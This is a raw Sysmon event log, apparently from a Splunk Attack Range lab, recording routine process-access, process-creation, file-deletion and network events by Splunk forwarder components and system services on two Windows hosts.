11:09:01.546{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295917Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:01.546{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295916Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:01.545{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-15CD-6216-DD06-000000003802}5960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295915Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:01.544{C8EA50B7-15CD-6216-DD06-000000003802}5960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295914Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:01.246{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=921DE8EB33570159D4B33D384D594587,SHA256=A213C49EC0981391BE5BF5BAA58089599F297BBC8803238C6A718D7B337B3DB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220066Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:01.097{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68170074C2C12557E08A0937D2D09307,SHA256=9C0E764860433F37717F3BB997E15E25151778F5A379AC79C106290909606CD0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295932Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:02.756{C8EA50B7-15CE-6216-DE06-000000003802}6180900C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295931Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:02.411{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-15CE-6216-DE06-000000003802}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295930Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:02.411{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295929Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:02.411{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295928Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:02.411{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295927Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:02.411{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295926Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:02.411{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-15CE-6216-DE06-000000003802}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295925Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:02.411{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-15CE-6216-DE06-000000003802}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295924Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:02.413{C8EA50B7-15CE-6216-DE06-000000003802}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295923Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:02.280{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D46EBA8DE2E4E6AA92CDECBF4DD7B8C5,SHA256=F1FB956B171BF22511C47353837837EDACAE86962150C84E34DDE2382269D140,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220067Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:02.112{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC4BE139BC7190CFD11AFA2278680F8D,SHA256=4B6B00396FB2AFC2C39CDC2ECDD1A967D6586227BB5B944D0C4A5B9DD08F2B50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220068Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:03.128{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=022DACDF7FC9BBFBD287F01EB22A1FDC,SHA256=EB47D18EEAED7C21D0A578CA3C46E86F6A63771D1645C5A9EA15DCA7F82B46AE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295941Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:03.888{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-15CF-6216-DF06-000000003802}5288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295940Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:03.888{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295939Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:03.888{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295938Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:03.888{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295937Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:03.888{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295936Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:03.888{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-15CF-6216-DF06-000000003802}5288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295935Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:03.888{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-15CF-6216-DF06-000000003802}5288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295934Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:03.890{C8EA50B7-15CF-6216-DF06-000000003802}5288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295933Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:03.372{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98737E3AF083109D2BA783CA386E9E87,SHA256=2FDF592B6D893AE71C9F818DAD1C19EBA986CBE233B46B38C24E1E23E5756AE2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220070Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:02.499{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51556-false10.0.1.12-8000- 23542300x8000000000000000220069Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:04.347{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B30E4A15B8E133ADCC3BACD0EE4538C7,SHA256=28B805694F6D77E732BA3AD032AC041C6F11DA4E02A6465B4F1D29F92442C267,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295942Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:04.388{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECA4C9CDEA2193FC3C84A31856C649F7,SHA256=6FD703F4E09F5901E2546A6CE57DEA693C750B490B8A3C9D2FB8684F338011BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220071Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:05.394{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39B8FCD075371EF3A9E2E64BAC6D6C15,SHA256=ED07F9A91FB8339B1EDAC056CB48B6DD2D984E7AFEAB04D3E8278263EB6C7E5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295946Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:05.389{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3494D6B4108428D9412153F1FBCB0F73,SHA256=B725AC60F69D2423A7448D6188B57B75A1C828A5A0FDA4BC960CC7E6E2A6D416,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295945Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 